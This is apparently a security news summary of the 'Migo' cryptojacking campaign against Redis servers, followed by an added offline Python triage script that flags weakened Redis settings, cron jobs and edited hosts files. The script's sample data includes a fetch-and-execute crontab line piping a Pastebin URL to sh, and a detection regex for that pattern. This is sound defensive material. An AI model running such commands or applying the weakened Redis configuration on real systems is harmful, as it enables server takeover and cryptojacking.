February 20, 2024 at 02:44PM
Researchers discovered a new malware campaign targeting Linux-based Redis servers, using a piece of malware called ‘Migo’ to mine for cryptocurrency. Migo disables key security features of Redis, allowing attackers to run cryptojacking activities. It also establishes persistence for a Monero miner, uses a rootkit for concealment, and manipulates system settings.
The key takeaways are:
1. A new malware strain named ‘Migo’ targets Linux-based Redis servers to mine for cryptocurrency. It uses system-weakening commands to turn off Redis security features, enabling cryptojacking activities to continue for extended periods.
2. The ‘Migo’ campaign was observed by analysts at Cado Security, who noticed attackers disabling critical security features on exposed Redis servers with CLI configuration commands: turning off protected mode, which otherwise refuses commands from remote clients on an instance with no password configured, and making replicas writable, so that the attacker can push arbitrary data and commands to the server remotely.
3. The attackers then set up a cron job that downloads a script from Pastebin; that script retrieves ‘Migo’s’ primary payload, a UPX-packed ELF binary compiled in Go, which in turn launches a modified XMRig (Monero) miner on the compromised endpoint.
4. ‘Migo’ employs a user-mode rootkit to hide its processes and files, sets up firewall rules, disables SELinux, and manipulates system files to prevent the host from communicating with its cloud service provider, all of which complicate detection and response.
5. The attack demonstrates a strong understanding of the Redis environment and operations, with the potential for the threat actor to deliver more dangerous payloads beyond cryptojacking.
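The behaviours in takeaways 2 to 4 (weakened Redis configuration, a cron job that fetches a script from a paste site, and system files edited to cut the host off from its cloud provider) are the artefacts a responder would look for first. The following triage helper is an added example written for this page; it is not code from the original article or from Cado Security. It runs offline over constructed inputs that imitate the raw key/value output of `redis-cli CONFIG GET *` (non-TTY format), a crontab, and `/etc/hosts`. The Redis option names (`protected-mode`, `replica-read-only`, `requirepass`, `dir`) are real redis.conf settings; the paste-site hostnames, the cloud hostnames, the cron-directory check, and the sample inputs are assumptions made for illustration.

```python
"""Offline triage for the Redis-weakening pattern described above.

Added example; not the article's or Cado Security's code. All sample
inputs below are constructed, and the host lists are assumptions.
"""
import re

# Documented redis.conf settings whose weakened value lets a remote,
# unauthenticated client run commands (protected-mode) or write to a
# replica (replica-read-only).
WEAKENED_SETTINGS = {
    "protected-mode": "no",
    "replica-read-only": "no",
}

# Directories where an RDB dump written via CONFIG SET dir/dbfilename is
# read as a crontab. A general Redis-abuse check, not a claim about Migo.
CRON_DIRS = ("/var/spool/cron", "/etc/cron.d", "/etc/crontab")

# Hosts commonly used to stage a first-stage script (assumed list).
PASTE_HOSTS = ("pastebin.com", "transfer.sh", "paste.ee")

# Cloud-provider hostnames a miner might null-route in /etc/hosts so the
# host can no longer reach provider agents (assumed list).
CLOUD_HOSTS = ("amazonaws.com", "aliyuncs.com", "cloud.tencent.com")


def parse_config_get(text):
    """Pair up the alternating key/value lines of raw `CONFIG GET *` output."""
    lines = [l.strip() for l in text.strip("\n").splitlines()]
    return dict(zip(lines[0::2], lines[1::2]))


def check_redis_config(text):
    cfg = parse_config_get(text)
    findings = []
    for key, bad in WEAKENED_SETTINGS.items():
        if cfg.get(key) == bad:
            findings.append(f"redis: {key} is '{bad}'")
    if cfg.get("requirepass", "") == "":
        findings.append("redis: no requirepass set")
    if cfg.get("dir", "").startswith(CRON_DIRS):
        findings.append(f"redis: dir points into a cron path ({cfg['dir']})")
    return findings


# curl/wget of a paste-site URL piped straight into sh or bash.
CRON_FETCH = re.compile(
    r"(curl|wget)\b.*https?://(" + "|".join(map(re.escape, PASTE_HOSTS))
    + r")[^\s|]*.*\|\s*(ba)?sh\b"
)


def check_crontab(text):
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.strip().startswith("#"):
            continue
        if CRON_FETCH.search(line):
            findings.append(f"cron: fetch-and-execute from paste site: {line.strip()}")
    return findings


def check_hosts(text):
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        if parts[0] in ("0.0.0.0", "127.0.0.1") and any(
            h.endswith(c) for h in parts[1:] for c in CLOUD_HOSTS
        ):
            findings.append(f"hosts: cloud endpoint null-routed: {line.strip()}")
    return findings


def triage(config_text, crontab_text, hosts_text):
    """Run all three checks and return the combined list of findings."""
    return (check_redis_config(config_text)
            + check_crontab(crontab_text)
            + check_hosts(hosts_text))


# Constructed sample inputs imitating a weakened host.
SAMPLE_CONFIG = """
protected-mode
no
replica-read-only
no
requirepass

dir
/var/spool/cron
dbfilename
root
"""
SAMPLE_CRONTAB = """# m h dom mon dow command
*/5 * * * * curl -s https://pastebin.com/raw/example | sh
0 3 * * * /usr/bin/certbot renew
"""
SAMPLE_HOSTS = """127.0.0.1 localhost
0.0.0.0 update.aliyuncs.com
0.0.0.0 ec2.amazonaws.com
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_CONFIG, SAMPLE_CRONTAB, SAMPLE_HOSTS):
        print(f)
```

On a live host the same checks map to `redis-cli CONFIG GET '*'` (authenticated, from the server itself), `crontab -l` for each user plus the files under `/etc/cron*`, and a read of `/etc/hosts`. The configuration side of the fix is the inverse of what the attackers did: keep `protected-mode yes`, bind to specific interfaces rather than `0.0.0.0`, set `requirepass` or Redis ACLs, and restrict or disable the `CONFIG` command for application users.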
The threat actor’s detailed understanding of the Redis environment and their ability to avoid detection and manipulate system resources raises concerns about potential future attacks beyond cryptojacking.